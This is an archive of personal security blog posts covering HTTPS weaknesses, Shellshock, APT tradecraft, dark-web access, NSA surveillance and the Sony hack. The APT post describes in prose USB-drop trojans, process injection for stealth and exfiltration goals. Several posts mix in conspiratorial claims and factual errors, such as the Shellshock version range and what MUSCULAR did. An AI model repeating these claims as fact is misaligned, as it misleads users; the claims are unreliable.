Hack The Planet: Security by Obscurity in the 21st Century

Mr Robot Season 2 Easter Eggs: Ransomware Message Revealed and Decoded!

noreply@blogger.com (UnsecurityNow) — Thu, 14 Jul 2016 19:37:00 +0000

Hello folks! I'm sure you have heard about the most popular TV Show of 2015 and perhaps of 2016, multiple awards winning TV sensation of Mr Robot. I don't like TV shows and don't watch TV at all, but I got caught with Season 1 because of the hacking techniques the main character uses which sound and seem pretty legitimate (as well as the terms). So, Season 2 took off yesterday but there has been a lot of work done on the Internet about it before then not only on their website, but also outside of it; including Easter eggs! Easter eggs are "secrets" buried in layers for people to find out. I have stumbled to a few great surprises but one was worth noting. After they released Episode 1 before the air-date, kept me wondering...

Episode 1 concludes in a Ransomware attack to evil corp banks which leaves their computer inoperable. I could take a screenshot of it and decided to investigate the victim's IP address (which is public by the way) and found something interesting. There seemed to be a message buried behind the timer which resets every-time you open the website, but what if I could stop the timer and let it go to 00:00:00? What would happen when the timer sets to 0? Watch the video, learn a little about JS and base64 encoding (where the message is buried), grab some pop-corn and enjoy the video.... Dubtstep style!

How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 8 and 10 Computer

noreply@blogger.com (UnsecurityNow) — Thu, 14 Jul 2016 18:45:00 +0000

Hello there. I have been a bit busy working and on-side projects so I would like to share with you some old work I have done before which I haven't shared on my Blog. Even though I have done a similar video with Windows 7. This shows that the principle of this flaw does not rely on software but in the design of it. Since Micro$oft is too busy fixing more "relevant" bugs, I am posting this only for educational purposes. I am not responsible nor condone illegal acts.

Now, watch and enjoy!

Windows 8:

Windows 10:

How to determine your HTTPS is really secure

noreply@blogger.com (UnsecurityNow) — Tue, 06 Oct 2015 18:06:00 +0000

At this time when not even HTTPS is considered 100% secure, how do we determine we are going through a secure connection? How can we tell that our connection from point A to point B is not being eavesdropped by a man in the middle? Nowadays, regular and more IT inclined users must be equally aware of their dangers and how to mitigate it. With recent vulnerabilities such as FREAK and Heartbleed, how can we know the TLS/SSL security are not being downgraded after we click a link? Well, read on.

Definitions

So, how do we determine if a connection is secure/insecure? First of all: what is considered insecure? Well, we know that a secure HTTPS connection includes the SSL/TLS data encryption and authentication protocols. We also know that SSL (Secure Socket Layer) protocol is the predecessor of TLS (Transport Layer Security). We now know that SSL (even its last version 3.0) is really insecure from what we've seen in old and recent bugs and vulnerabilities such as POODLE, BEAST, Heartbleed and FREAK. We also knwo that TLS 1.2 is the most secure (yet) protocol that goes along HTTPS communications. But things are not easy as they might seem, even TLS v1.2 (if not properly configured) can also be a target for BEAST vulnerability attacks.

Determining Vunerability Vectors

Depending of the attack, bug of vulnerability, there are different and many ways of compromise a system but the vectors associated with them are to be accounted for. For example, if you're susceptible for a MiTM (Man-in-the-middle) attack, he can potentially downgrade your secure connection thus leaving your system unprotected from the beforementioned attacks. This is call "Downgrade Attack". Also, believe it or not

Plan of Action

In order to have a plan of action, it is very important to determine what products are installed in your computer(s). By maintaining your browsers at the most minimum (is there a reason to have 3 different browsers on your computer?), it will simply mitigate risks. This is because we do not always remember to update our browser or simply if we think our Operating System is patched, our Browser(s) are too.

Check SSL/TLS in Chrome

Check SSL/TLS in Firefox

This is a common mistake for amateurs and rookies in the subject, but they must be aware of the risks and take action. Also, by running OpenSSL and TestSSL utilities, we can determine what SSL/TLS ciphers are at risk for example RC4-MD5 or RC4-SHA. Also, such protocols such as TLS 1.0 is not secure anymore and you should rely on 1.2 at least. By using these utilities, it will help you in knowing what should be changed in order to have a little more secure web application.

You have to be careful because if your web application uses the RC4 Cipher Suite, the connection might not be as secure as you might think. The RC4 cipher is not a pseudo-random value that gets generated but the first 65 bytes can be decrypted in order to obtain passwords or cookie information stealing the session. By having this "Invariance Weakness", it leads to an attack called Bar Mitzvah which can be used to steal your session information.

In the Bar Mitzvah attack, it only takes 65 bytes to decrypted data (after the handshake) stealing cookies or passwords.

The plan of action for RC4 is to totally deactivate it in order to mitigate these risks.

Sources

Definition of POODLE: https://isc.sans.edu/forums/diary/SSLv3+POODLE+Vulnerability+Official+Release/18827/

Definition of BEAST: http://www.webopedia.com/TERM/S/ssl_beast.html

Definition of Heartbleed: http://heartbleed.com

Definition of FREAK: https://freakattack.com/

Downgrade Attack: https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack#MITM%20TLS%20Protocol%20Downgrade%20Attack

OpenSSL: https://www.openssl.org

TestSSL: https://testssl.sh

RC4 Vulnerability: http://securityaffairs.co/wordpress/35352/hacking/bar-mitzvah-attack-on-rc4.html

BASH ShellShock Bug

noreply@blogger.com (UnsecurityNow) — Tue, 07 Jul 2015 04:14:00 +0000

By this time we all know that the BASH Shellshock Bug is now history, but think again. There are times when I have found servers with their BASH outdated. Since we know the versions affected are <=3.4, the good news is that it can be easily mitigated. By just updating BASH, you already are ahead of the game. The sad thing: not everybody update their system accordingly. Believe it or not, lots of companies still don't have their system patched and this has to change. They have to start being more conscious about their customers and clients and stop being lazy.
On this video, I will show you what the Shellschock Bug is, the risks of it, how to penetrate a vulnerable system as well as how to mitigate it. Enjoy

Getting Closer to a New Machine Era

noreply@blogger.com (UnsecurityNow) — Fri, 10 Apr 2015 19:17:00 +0000

"Also it causes all, both small and great, both rich and poor, both free and slave, to be marked on the right hand or the forehead, so that no one can buy or sell unless he has the mark, that is, the name of the beast or the number of its name. This calls for wisdom: let the one who has understanding calculate the number of the beast, for it is the number of a man, and his number is 666." -Revelations 13:16-18

A Word from the Blogger

We are emerging to a new phase. As passwords are slowly becoming more obsolete because of its nature of being insecure and hard to remember, a new era is emerging which will have a lot of controversy. Since biometric methods of authentication haven't delivered what they promised, they also been proven to fail a lot of times in these few years and we have seen how it can be easily bypassed in the last few months, we are now to wonder: how are we supposed to store our information and do our "private" actions through the Internet without having our account (which, by the way, now contains everything we do) compromised.

www.slate.com

Even though I really love technology and I enjoy experimenting with it, I am completely against the ideology of merging humans with robots. I am completely against the ideology of having robotic parts embedded into our body to surpass our average capabilities and nature of being what we are... humans. By merging embedded robotic parts with our body to make ourselves "more efficient", is a mocking to God because of the arrogance and pride of wishing to be not only like Got but better than God. If God wanted us to be robots, he would have created robotic parts in ourselves. Also, it goes against the laws of nature which is also enforced, controlled and mediated by God. If the laws of nature are altered, an endless of domino reaction cataclysms would occur.

The Article

I have read some news which I could not let them slip. In fact, I had other Blog entries in production and ready to push into live publishing, but I believe this is more important; so I started on this topic right away. This event will the start of a huge dystopian life change in which the human race will long regret.

On Friday April 17, 2015 in the Wall Street Journal, came an article, one of the most ever life changing in history. "A PayPal executive who works with engineers and developers of Paypal said that "to find and test new technologies, embeddable, injectable, and ingestible devices are the next wave in identification for mobile payments and other sensitive on-line interactions." Also, the head of PayPal's and Braintree's Global Development Advocacy Jonathan LeBlanc said that "The future of identification would not rely on passwords." As we know, PayPal has not only proven in the past to be a more secure than traditional forms of on-line payments but also has proven to have certain vulnerabilities which exposed its user's use-rnames and encrypted passwords but also two-factor authentication techniques were previously hacked.

The Problem - Fear to the Public

For these reasons as well as the fact that passwords (no matter how much encryption they have) are always eventually brekable, PayPal is turning its odds to a more "reliable", secure and easier to use: Embeddable, Injectable and Ingestible Devices.

http://www.makeuseof.com

As LeBlanc has stated on his presentations named "Kill All The Passwords" presented all over the U.S. and Europe, 91% of people use passwords listed in the top 1000 most used passwords list and 79% on the top 500 respectively. He also added more fear the fire by stating that the already (relatevely) safe algorithms we know now such as MD5, SHA-1,2 and 3 have bad security. Additionally, he also stated how Biometric authentication has a lot of false positives and false negatives making the authentication process a real pain to use and it is not an integrity check in which we can easily trust.

As the IoT (Internet of Things) are merging all our societal and private life facets to a more organized, transparent and traceable public domain, passwords are no longer trusted to "safeguard" our already-on-the-domain identities, therefore here comes his "solution".

LeBlanc Solution


http://www.slideshare.net/jcleblanc/kill-all-passwords

As any seasoned salesmen and social-engineer already know, in order to sell a product or convinced someone to do a certain thing (a thing he wants you to do), he first has to create the need for it. One of the techniques used to accomplish this is to create fear. Once the fear and need is established, the solution comes next. LeBlanc states his solution to authentication by using:

-Fingerpring Scanning
-Vein Recognition
-Heart rate monitoring

By the following methods:

-Ingestible Technology: Ingestible capsules will be used and powered by stomach acids to detect glucose, blood pressure,digestive health and other unique internal parameter patterns.

-Brain-Chip Implants will be used (through built-in ECG sensors) to monitor the unique electrical activity of a person’s heart, and communicate via "wireless wearable computer tattoos."

http://www.slideshare.net/jcleblanc/kill-all-passwords

These methods, LeBlanc states they will be "natural body identification", which we already know it will not be true, because the machine (bits and bytes) will be required to analyze body patterns, which does not make it 100% natural. Think about false positives of our body reaction through the use of drugs, anomalies, sickness, and unexplained pattern behaviors.

FIDO Alliance

PayPal has partnered with FIDO Alliance to incorporate better authentication systems for their users. One of their projects is the Universal 2 Factor (U2F) authentication. As FIDO Alliance states on one of its videos, U2F offers a more "open, secure and easy to use standard by using a public and private key pair." The Bluetooth USB-like adapter device will not require drivers and will be used as a second method of authentication (after inputting the password) and will be the intermediate between the browser and the user to prevent keylogging, phishing (the most weak link) and MitM (man-in-the-middle) attacks. It will be also used with the mobile devices which, with the integral part of Duo Push will be used as a phone App.


https://fidoalliance.org/about/overview

In my opinion, this will be the bridge and the temporary solution for PayPal before they go full speed with the new and so radical change which will change our lives forever.

Final Thoughts

We are now living a very crucial time when the fight for privacy, human rights, wars, terrorist attacks made through false flag operations and our form of communication as well as authentication will be playing a huge new role and change to a more dystopian reality which will be combined with our "own form of control" by using our own medical record, health situation and body parts to keep our private data, the data that never had to be released to the public domain, secure. It is now the time to change our dormant state and fight for our human rights, which is the last thing we have left. If we don't anything, one day our future grand children will look at the past (if not altered) and ask: what has happened with our humanity?

Sources

WallStreet Journal Article: http://blogs.wsj.com/digits/2015/04/17/paypal-wants-you-to-inject-your-username-and-eat-your-password

LeBlanc Presentation: http://www.slideshare.net/jcleblanc/kill-all-passwords

FIDO Alliance: https://fidoalliance.org/news-more/videos/

PayPal FIDO: https://www.paypal-pages.com/samsunggalaxys5/us/index-faq.html

The Evolution of Hacking: Advanced Persistent Threats (APT)

noreply@blogger.com (UnsecurityNow) — Fri, 03 Apr 2015 17:01:00 +0000

www.itbusinessedge.com

Introduction

In the last couple of decades we had observe some of the most brilliant hacking techniques ever known. We also delved into a lot of sophisticated Malware which redefined the whole concept of security. As more and more simplicity are being worked on the tools and more people adapt to the whole security world, we have seen a substantial growth in not only sophistication but also security persistence. Here is what becomes: APTs.

Nowadays, we are not only fighting against malicious and curious hungry people who want our data, identity and financial information but also against governments, mafias, and "terrorist" nations to gain trade and national secrets. As this world might be coming to an imminent end (the end of humanity), it is logical to think that more and more havoc will be caused into our lives and in order to survive, we will have to accept a New World government, where everything will be monitored, judged, moderated and executed within one a World Organization in justification for total security and safety for all humanity.

As more havoc is being done in this society, so it happens in our digital world. Better autonomic, resillient and cognitive systems are also put into the market (and our society) and to the hands of the gifted ones (and malicious users) in order to provide this society with more advanced, smart ways to silently break into the most sophisticated and secure systems. Advanced Persistent Threats is defined as " a set of stealthy and continuous computer hacking processes, often orchestrated by human(s) targeting a specific entity." By disseminating each word, we have a better idea of what APT really is:

Advanced - Multi-vector 0 day attacks.

Persistent - Undetectable attacks over a long period of time.

Threat - Manace over sensitive information to a critical infrastructure and assets.

Past Examples

Below there are only a handful of APT examples:

PoisonIvy
Stuxnet
NightDragon
GhostNet
Lurid

Past Targets

Moonlight Maze (1998)
Titan Rain (2003)
US Congressmen (2006)
Oak Ridge National Laboratory (2007)
Los Alamos National Laboratory (2007)
US Department of Defense (2008)
Office of His Holiness the Dalai Lama (2008)
Operation Aurora (2009)
Australian Resource Sector (2010)
French Government (2010)
Canadian Government (2011)
Australian Government (2011)
Comodo Affiliated Root Authority (2011)
RSA (2011)
Oak Ridge National Laboratory (2011)
L-3 Communications (2011)
Lockheed Martin (2011)
Northrop Grumman (2011)
International Monetary Fund (2011)

How APT Works

First, it is important to identify the phases of a successful APT. In order to successfully attack a system without being detected, a series of out of the radar sophisticated techniques must be used.

First Step - Advanced (Infection)

Attack is conducted by sending the RAT's Trojan (server file) by tricking the user to run it.

Methods can be used as attachments, visiting a website which a vulnerability was taken advantaged of the malicious user which can download the Trojan of the RAT. An indirect and less suspecious method is being used by simply throwing a USB drive with the RAT's Trojan software to the target's backyard, car, or personal item such as his coat, or pant's pocket. If he plugs it in thinking he luckily found a USB he can use, the malicious user can craft an autoexecutable which executes the RAT's Trojan software in the background. He can put random school documents or home-made pictures (not his own) to make it less suspecious. A more advanced alternative is if the malicious user crafted a malicious software which downloads the server file (RAT's Trojan) when innactivity is detected on the target's machine, so he doesn't notice system's performace or hints when the connection, download and auto-execution is taking place.

The attacker, once the victim is infected, can manages the victim's PC through the Remote Administration Tool (the RAT).

When the victim is infected, it simply notifies the malicious user who is running the RAT on his end. Then, the malicious user can conduct a series of activities:

-Keylogging (logs every single keystroke)
-Uploads and downloads system's files
-Unrestricted remote shell login
-Uses proxy services to hide attacker's identity (through HTTP/SOCKS)
-Kills, lists and starts system processes
-Spies on victim's webcam
-Screen Captures
-Full administrative access to files and system's registry
-Used to send SPAM from the victim's machine
-Logs-off, restarts and shutdowns the victim's computer
-Update the RAT's server (trojan) on the victim's machine
-Uninstallation of RAT itself

Second Step - Persistent (Methods)

The persistent phase comes when the attacker conducts such stealthy activities, such as:

-Updating the server file on the victim's machine so it doesn't get detected by anti-malwar
-Inject the server file to a specific system process. i.e: winlogon.exe, iexplorer.exe or rundll32.exe.
-The server file's shortcut image can be changed as well as the name of the file to avoid detection.
-Auto-runs and connects to attacker if the server's injected service is killed

Third Step - (Exfiltration) Threats

This serious threat can be used to make nefarious exfiltration of mass data such as:

-Network footprinting
-Assets enumeration
-Usernames and Passwords
-Administrative domain account creation for further access
-Plant backdoors for evasion
-Secret data and company secrets' leak
-Data and infrastructure corruption
-Compromise other hosts
-Privilege Escalation
-Encrypt critical files and demand ramson to decrypt it
-Etc,Etc,Etc

Final Thoughts

As we are going through a war phase, a lot of attacks are being made with digital weapons. More instrusive controls such as better digital IDS/IPS signatures, more skilled people, Firewall rules and Anti-virus behavioral scans as well as signatures (come on, they do help a little) are getting behind exponentially with the emerge of more sophisticated APT malware. With the evolution of cognitive systems, soon we won't have to enlist to fight wars because machines will be able to fight them for us. The hacking techniques now being used as almost automatic and will soon be cognitive and conducted with the help of a more accurate AI (artificial intelligence). In this information age, not only critical infrastructure but also the whole society's information is the target and at risk minute by minute. That is why we need to be our own Firewall and not only be diligent about our activities and actions (they do cause an effect), but also about how we determine our future.

The Bill of Rights

noreply@blogger.com (UnsecurityNow) — Fri, 27 Mar 2015 17:00:00 +0000

Privacy is affected in many ways. The Bill of Rights subjects to the privacy of not only conducting your own religion and assembly at your own place without being detained but also after you are being detained to testify for a crime that you haven't seen or have no more details to add. Also, the freedom of having your own thoughts or ideas as long they do not affect a third party (freedom of speech), the right of bear arms (as long as you have a valid gun license) and the freedom of deciding whether a militia, navy or army man should stay at your house while the nation is “under peace.” Certain rights impose the fact that we are still free but some of them, such as the freedom of speech are a double edged sword. If one speaks badly about certain things just because it is his thought, and someone sensitive just feels annoyed or hurt, you could be in trouble.

The same goes for the government. If the government thinks you have hurt them, your freedom of speech is no longer free, and you will be punished for it. It depends a lot how people, entities, and governments take your argument. Of course, this is more prevalent when there is an abusive system. People, then rather not even express their opinions and there is where freedom of speech lacks.

Since after 9/11, not only we can see a proliferation of abuses not only to the Bill of Rights but also seen on top-secret papers exposed by whistle-blowers such as Chelsea (former Bradley) Manning and Edward Snowden as well as by journalists such as Glenn Greenwald and Julian Assange dismantling horrific projects and operations from the NSA as well as from the Five Eyes (intelligence alliance compromising Australia, Canada, New Zealand, United Kingdom and the United States). Little by little our freedoms are diminishing for the name of “National Security” with freedom interfering Acts as the Patriot Act (especially Section 215), Net Neutrality, Trans-Pacific Partnership (TPP) and other mass-surveillance programs. People need to wake up before it is too late, because we are now facing the end of “our own control” times.

We are rapidly and nefariously losing our freedoms for the name of “security” selling us a plethora of dystopia realities fabricated by false-flag operations such as the endless wars we are facing now as well as producing horror propaganda orchestrated by a shadow unified government with terrorists groups using their best weapon: media disinformation. We need to act and we need to act now because as Benjamin Franklin once said: “Those who give up their liberty for more security deserve neither.”

Meet The Hidden Web

noreply@blogger.com (UnsecurityNow) — Fri, 20 Mar 2015 17:00:00 +0000

Terminology

Also known as the Dark Web, Deep Web, Darknet or darkweb, whatever is left out of search engine indexes is located in these darknet. Despite the name used, according to NPR.org, the deepweb is made out of 96% of all content, far more webpages than the World Wide Web. What we cannot see with our "naked" eye (or in this case with traditional methods) is known to be unkown, but thanks to services such as Tor or I2P, we can actually experiment the full potential of information flow.

Now, how can we know what is indexed and what is not? Well, for the most part it is very hard to know without delving yourself into the darknet itself, but some of it can be found in the "robots.txt" file of some websites. As previously stated in one of my Blogs, the robots.txt file can be easily accessed, for example, on this website.

When connecting to the deep web, you can determine it is non-indexed because the websites are randomly assigned and have a .onion extension after their domain name; for example, DuckDuckGo's search engine website is http://3g2upl4pq6kufc4m.onion.

How to Access It

Like everything on my Blog entries, I do not condone anything illegal or foolish. Use the darknet as your own discretion. You can find horrific, ugly things as you can also find beautiful lost pieces of information.

The way to access the .onion sites is through Tor. As previously stated in my numerous Blogs, Tor was invented by the U.S. Navy in the mid-90's and it provides a pretty anonymous access to the Internet as well as I2P and .onion sites as well (darknets). Not only people who want to hide their "activities" can use Tor but also countries like Egypt, Lybia, Afghanistan, etc who don't have a complete access to the Internet and information. Also, a lot of criminals such as paedophiles, hitmen, cyber-criminals, cyber-bullies, drug and gun dealers access the darknets as well as black markets to sell their good in an anonymous way. These last uses are the reasons why darknets are considered dangereous.

There are easy and fast alternatives such as the Tor Browser which takes care of the tedious install and proxy configurations but it is not guaranteed that Tor will be 100% anonymous "out of the box". Further configuration is always required.

Even though Tor had some issues with bugs, security flaws and potentially NSA's surveillance and spoofed relays to spy on people, it is not wise to judge the whole Tor project because of some rotten potatoes in the past. A lot of flaws were and are being fixed everyday as well as other software in the market. After all, Tor is also based on software and protocols which are being fixed and improved all the time. Also, it is not safe to consider Tor as a bullet-proof for all your "hidden" activities, but it is a good choice as an extra security layer to have in your security arsenal.

Where to Look

Once you connect to the Tor Network, you can find who are in the network acting as relays. Each relay are the people helping your connection being more secure. The entry and exit nodes (you and the server) are the only who knows about the site you are trying to visit (not the relays) and they also think your connection comes from another country. Also, it is important to note that the only unencrypted part is from the exit relay to the destination.

All of this is only to understand a little how Tor works, but let's get to how to surf the deep web.

For starters, let's first find a starting point. To find a starting point, we need either 1) an .onion site with a list of other sites or 2) a search engine for deep web sites. The reason why the first one is not very reliable is because the list is always out of date and the links might not work. The original one is called CoreOnion.

1) There are sites that lists, or at least, tries to list the most up to date links. Some of them are: The Hidden Wiki, Tordir, and the Onion URL Repository (You will need to be running Tor to enter to these sites).

2) You can also look at search deep web engines for .onion sites. Some of them are: DuckDuckGo, DeepSearch, and Abyss. (You will need to be running Tor to enter to these sites).

Once you have a starting point, you can surf on your own discretion. You will find a lot of information just about anything, and I mean ANYTHING.

Deepweb and Censorship

One of the reasons governments cannot shut down the deepweb entirely is because governments also use it to hide their activities and make them more anonymous in order to avoid infiltration, eavesdropping and data leak. As anything in this world: one tool which is used for the good of humanity can and will be always be used as all things evil. Even though there are tons and tons of criminal activities in the deepweb and lots of them are being shut down such as "The Silk Road v1 and v2", it is impossible to shut them all at once without bringing down the Tor network.

The Repercussion: In Numbers

Since the military, governments, navy, airforce and secret societies also use the I2P and Tor networks to hide their daily "secret" activities, it would be a total loss for all of them if they shut it down. Governments always try to keep control of the darknet by shutting down criminal content most popular sites but they re-open soon after with a new random .onion address, or better yet, a mirror somewhere else. The repercussion, however was not a lot comparing with the profit. For example, The Silk Road v2 had approximately 1 million members and was making 1.2 billion in yearly profit. When the Silk Road was shut down by the F.B.I. on November 5, 2014, they sized about 26,000 bitcoins (equivalent to 4 million U.S. dollars at that time). Bitcoins is the anonymous form of purchasing services and goods in black-markets through the darknet. Used as BTC in the stock exchange and now (by April 6, 2015) it is worth 258.19 U.S. Dollars. Suprisignly, Silk Road's operator made $80 million in commissions from its members. When the silk road re-opened its value went 3 times what it was worth both in members and financially.

Net neutrality and Last Thoughts

After the EFF winning over net neutrality on March 12, 2015, ISPs and Cable companies don't have access to a lot of their client's control but since they lost the battle (but not the war) they are finding new ways to supress their clients' browsing actions which is not included in the Net Neutrality rules. For example, Comcast is currently performing DPI (deep packet inspection) techniques to ensure they alert governments (if asked) if a customer is using Tor. Since, they deeply analyze their customers' packets, they can determine who is using Tor and who isn't. One easy (but not bulletproof) way to avoid this is to use Tor Bridges. Since using Tor relays which are indexed from the Tor network, if Comcast (or other ISP company) has access to this list, they can easily determine who is using Tor thus blocking access to it so the customer cannot access any site through it. By using bridges, they cannot determine if their customer is using Tor because the bridge address is not listed as "public" in the Tor network, thus they cannot discern between a Tor or non-tor connection. They just don't know what it is. Bridges are being used in highly-oppressing countries, countries such as China, Hong Kong, Lybia, Egypt, Labanon, Syria, etc. to bypass their government Firewall. They also use Proxy Chains which intercorrelate their connections and bounce it through a series of proxies to anonymize traffic even further.

Additionally, you can use a VPN with Tor and Bridges to ensure more layers of anonymity, since by solely using Tor does NOT guarantee 100% anonimity.

With the emerge of a new, faster (even more controlled) Internet and free Internet such as Kim Dot Com's MegaNet, it is hard to conclude that Tor will be long enough to live our end of times. Perhaps, a less centralized, non-IP address based network will be used for Freedom Fighters as the rest of the civilization will be using a faster but more controlled (and censored) Internet like the emerge of the Internet v2, which is already in progress and perhaps will be using HTTPS/2 (founded by Google). It would be soon be a matter of speed and reliability vs privacy. The decision, hopefully, will be ours to make.

Sources:

Exploring Onionland: The tor .onion Darknet
DarKnet or DeepNet: What is it and how to access it?
Going Dark: The Internet Behind The Internet
Deep Web Links
How FBI brought down cyber-underworld site Silk Road
BTC in Dollars - Current Stock Price
EFF wins over Net Neutrality

Keeping yourself off of the Radar of the NSA. Only fiction? Part 2

noreply@blogger.com (UnsecurityNow) — Sat, 14 Mar 2015 03:41:00 +0000

Our privacy deminishes every day, day by day and the facts stated on part 1 of "Keeping Yourself Off the Radar of the NSA" is only the tip of this huge iceberg. The recommendation I gave for part 1 was to use Tails, even though it is not bullet-proof and the person who has the most knowledge wins in this cat and mouse game. In part 2, we will go through more risks which increase everyday while getting more complex as well.

On this week, we not only found out about software surveillance but also hardware and network-based data mining through big and wealthy corporations as well as the net neutrality law which, by the way, temporarily won the battle but certainly not the war.

Last week, we found out about a vulnerability on Linux systems which are taking advantage from physical DRAM memory chips to gain kernel access to the system. We also found out how Apple is sending the voice recordings consumers send to "Siri", the iPhone Intelligent Personal Assistant, to third party companies for advertisement and other undocumented purposes.

Further last week we have found out about certain phone brands such as Xiaomi Mi 4 is preloaded with malware by the manufacturer's customer ROM which then they denied and stated that those phones were fake replicas. But don't worry, not all news are bad news in regards with surveillance. Earlier this year, we have also found out about new ways to make it harder for governments and corporations to track our digital fingerprints. The British multi-millionaire Kim dot Com did not only invented a secured end-to-end encrypted way to chat with your friends, but he is also now reinventing a new non-IP based "Internet" called "MegaNet" which, he states, will defy the whole surveillance essence.

But this is not the only attempt of defy tyranic global spies. There are also other systems right now which are in Beta testing that will be used to form their own Internet and share information as free as people want it, because, after all, information should be free for the world to use it, manipulate it and see it however they would like as long there is no harm to others.

If you watched documentaries such as "Track me if you can" and "Terms of Conditions May Apply" (2003), you will realize that we have no or little control over our privacy. Even secret programs are out there that can track our identity by just finding our walking pattern. How are we then safe from the prying eyes?

From hardware, to software to global surveillance to secret programs to track people and break our privacy, we are in a dystopian world where our only weapon is knowledge.

Keeping yourself off of the Radar of the NSA. Only fiction? Part 1

noreply@blogger.com (UnsecurityNow) — Sat, 07 Mar 2015 02:59:00 +0000

What if I tell you that it is almost (if not) impossible to keep yourself out of the Big Brother's radar? What if I told you that even though you take the most paranoid precautions, you are still caught on the net along with the other fishes? What if I told you that everything you have found out, everything you know about keeping yourself more secure is totally useless and you are hopeless when it comes to keep your data and digital prints safe? Well, let's dive into some facts....

I have published last year a Blog in how to keep yourself more secure on the net and in the physical ("real") life. You should know that by the time I have published that Blog with solutions in how to better your privacy, more than a few Snowden's revelations have been surfaced even into the most naive people's eyes. The first thing you should know is that this is a mouse and cat game. This means that when the cat (the NSA for example) is trying to find new ways to push surveillance and autonomous systems to keep track of every single move we do, the mouse (freedom fighters and originalists) are sneakly moving forward finding new ways to keep their privacy a little more... private.

Edward Snowden who is now a refugee, along with the American journalist Glen Greenwald, had revealed some (not anymore) confidential U.S. Government files which pointed out the fact that we, as living beings in this world, are not free anymore. Having a huge radar and a non-stoppable fierce, we have found out from the Citizenfour movie, that the U.S. is not the only "evil" on this game. Other countries, such as the U.K., Rusia, China, Germany, France, Sweden and Brazil (to name a few) are also joining this surveillance of humans' dystopia.

How everything got changed

In the last couple of years we have not only found out the "secret" surveillance programs and secret projects the NSA and its partners were (and still) using such as Carnivore, XKeyscore, PRISM, Muscular, Tempora and Project 6 (to only name a few). We also now found out what I believe is the worse of the worst.

For now, the before-mentioned projects and programs work on a infrastructure level of networks (through spying big junks of data from big pipes) helped by Google, Facebook, Youtube, America Online, etc. We all know how BIG Google is and how they also have access to most of the residential wireless passwords of the whole world via Android phones. Also, through the Muscular program, we found out how the NSA is able to launch an exploit to any computer they want (regardless of the Operating System) in a matter of seconds. So, they have control over everyone's email, potential visited sites, potential personal information, habits (good and bad ones), data, metadata and every single piece of your life via Internet infrastructure and software. But this is enough for the NSA and its partners to have a total and perfectly shaped profile about their citizens, right? .. WRONG!!

Early last month, we have found out that China was putting Adware (Superfish) to Lenovo laptops by breaking and impersonating HTTPS certificates and also China was blamed for placing backdoors and surveillance software to routers in the past. Whether Superfish was software, now we are facing a new model. Not only the NSA but also other governments are using hardware to spy on users inadvertently. Earlier this month another Snowden revelation made a lot of people's jaws drop. This time, hiding "special, deletion-proof" spying software on the most common hard-drive brands, such as: Hitachi, Western Digital, Seagate, Toshiba within others. This poses a huge risk because now we do not and cannot trust not even our own brand new laptops.

Now that we know where we stand it is fair to ask ourselves: how can I protect myself? Is having a VPN, sitting behind 7 proxies or using TOR with a vast number of proxy-chains as well as using a live (read-only) USB drive running a live distro of Tails secure enough?

The Solution?

One thing we know. We know that this is a cat-mouse game and whoever knows more wins. But this is not quite enough. Whoever is faster by staying up to date, develop the most (cryptographically) secure software as well as having a paranoid (security concious) attitude might be ahead of the game.

What about phones? As we know in the recent news, Gemalto encryption keys were stolen by the NSA and British Intelligence Communities and as we know cloning SIM cards in order to evade some tracking is illegal in most countries such as the U.S. and the U.K. How can we protect against not only the big monsters of the digital information such as Google, Yahoo, Facebook, etc? What about the exploits blindly launched by the NSA to our devices? We could have the best Firewalls and IDS/IPS but are they really enough against any Government which has the top cryptographic and evading software in the world? What about defending against the spying hardware chipsets, hidden backdoors in our communication media such as routers and perhaps also Firewalls? How can we also be safe against phone surveillance now that we know our SIM card data (or metadata) is being watched, analyzed and profiled?

The only thing I can think of is to be abstinent, and run a live copy of Tails. Remove your hard-drive, disable services (hardware and software) you don't need, use and maintain your Firewalls, IDS and IPS, use TOR with Proxychains and of course, avoid doing anything stupid online.

Sources:

https://en.wikipedia.org/wiki/Global_surveillance_disclosures_%282013%E2%80%93present%29

www.huffingtonpost.com/2015/02/16/nsa-computer-spying_n_6694736.html

http://www.zdnet.com/article/nsa-gemalto-sim-card-encryption-hack-key-questions/

North Korea, SONY and SCADA Flaws

noreply@blogger.com (UnsecurityNow) — Tue, 27 Jan 2015 19:32:00 +0000

In these couple of months I have found some patterns and anomalies in the news as well as the not so traditional ones about the North Korea, SONY and SCADA insecurity. How does all relate to each other? Is it really North Korea's fault? Was this already planned to have justified means to attack North Korea or all of this happened to boost viewers on the not-so-cool movie: The Interview? What about the new Hollywood movie: Blackhat which is about SCADA attacks to North Korea? Well, here are some facts:

On November 24, 2014 a mystical image appeared on every SONY employee's computer at the same time warning them of an imminent demise.

The bad news appeared on the media by 10:50 AM, after SONY's phone systems, workstations, and e-mail servers were paralyzed across SONY's headquarters including all locations. The attackers threatened SONY by saying it is "only the beginning" and that they also have compromised their network and will release "internal data" they gathered. They also blackmailed them by releasing their "top secrets" if they do not "obey" with their demands. Whether these statements are true or not, it was released to the mass media. By obtaining 100 TB of information, the "Guardians of Peace" (as they called themselves) got some pre-released movies which they were going to be aired by early next month. I am not going further with the description of this attack but you can find more information here:

http://deadline.com/2014/12/sony-hack-timeline-any-pascal-the-interview-north-korea-1201325501

On November 27, 2014, as SONY systems were still inaccessible, five movies were released to the public from these cyber criminals. One that caught the mass media's eyes and people's attention was "The Interview". This movie in which the dictator of North Korea: Kim Jong-un is killed by some U.S. unofficial agents. This, caused a plethora of commotions, catastrophic and suspicious events unleashed to North Korea. A North Korean website called this movie a "provocative evil act."

Suspiciously, by the next day: November 28, 2014, North Korea already got the blamed for SONY's breach by the FBI which started conducting an in-depth research on the breach on December 1, 2015. After that week, the Associated Press blames North Korea for the attack just because some "cyber-security experts" stated that they have found “striking similarities" between the code used in the hack of Sony Pictures Entertainment and the one on South Korean companies and government agencies last year. Even though this seems like a blatant accusation, it wasn't until Thursday December 18 that the U.S. government publicly accused North Korea for such attacks. By this time, huge amount of critical sensitive and private data have being pulled from Sony Entertainment; including but not limited to future and past movie scripts and personal e-mail messages putting in hot water various Sony's personnel involving Angelina Jolie, journalists (blamed for aiding the cyber-criminals) and U.S. President Barack Obama who were all key ingredients to a very horrifying and unpredictable turmoil.

